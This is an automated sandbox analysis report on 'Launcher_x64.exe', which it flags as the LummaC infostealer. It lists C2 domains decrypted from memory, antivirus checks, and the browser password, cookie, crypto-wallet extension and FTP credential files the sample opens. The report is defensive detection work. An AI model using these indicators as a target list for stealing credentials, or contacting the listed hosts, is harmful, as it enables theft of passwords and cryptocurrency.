Source: C:\Users\user\Desktop\Launcher_x64.exe

Memory written: C:\Users\user\Desktop\Launcher_x64.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Launcher_x64.exe, 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: Launcher_x64.exe, 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: Launcher_x64.exe, 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: Launcher_x64.exe, 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: Launcher_x64.exe, 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: Launcher_x64.exe, 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: Launcher_x64.exe, 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: Launcher_x64.exe, 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: Launcher_x64.exe, 00000000.00000002.1668536407.0000000004B41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: undesirabkel.click

Source: C:\Users\user\Desktop\Launcher_x64.exe	Process created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"			Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	Process created: C:\Users\user\Desktop\Launcher_x64.exe "C:\Users\user\Desktop\Launcher_x64.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: EnumSystemLocalesW,	0_2_00D7B0C5
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: EnumSystemLocalesW,	0_2_00D768FD
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00D7B1B7
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: GetLocaleInfoW,	0_2_00D7B110
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: GetLocaleInfoW,	0_2_00D7B2BD
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00D7AA37
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: GetLocaleInfoW,	0_2_00D763F5
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: EnumSystemLocalesW,	0_2_00D7AC88
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00D7AD30
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: GetLocaleInfoW,	0_2_00D7AFF0
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: EnumSystemLocalesW,	0_2_00D7AF83
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: EnumSystemLocalesW,	2_2_00D7B0C5
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: EnumSystemLocalesW,	2_2_00D768FD
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_00D7B1B7
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: GetLocaleInfoW,	2_2_00D7B110
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: GetLocaleInfoW,	2_2_00D7B2BD
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_00D7AA37
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: GetLocaleInfoW,	2_2_00D763F5
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: EnumSystemLocalesW,	2_2_00D7AC88
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_00D7AD30
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: GetLocaleInfoW,	2_2_00D7AFF0
Source: C:\Users\user\Desktop\Launcher_x64.exe	Code function: EnumSystemLocalesW,	2_2_00D7AF83

Source: C:\Users\user\Desktop\Launcher_x64.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Launcher_x64.exe

Code function: 0_2_00D6A335 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00D6A335

Source: C:\Users\user\Desktop\Launcher_x64.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Launcher_x64.exe, 00000003.00000003.1826260410.000000000300E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826260410.0000000003003000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1858167471.000000000571B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835630979.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826186870.0000000005715000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826421624.000000000305B000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826260410.000000000303A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Launcher_x64.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Launcher_x64.exe PID: 7372, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Launcher_x64.exe	String found in binary or memory: %appdata%\Electrum\wallets
Source: Launcher_x64.exe	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: Launcher_x64.exe	String found in binary or memory: Wallets/JAXX New Version
Source: Launcher_x64.exe, 00000003.00000003.1793373114.000000000303A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Launcher_x64.exe	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Launcher_x64.exe	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Launcher_x64.exe, 00000003.00000003.1793373114.000000000303A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: Launcher_x64.exe, 00000003.00000003.1793373114.000000000303A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Launcher_x64.exe, 00000003.00000003.1793373114.000000000303A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":x

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Launcher_x64.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
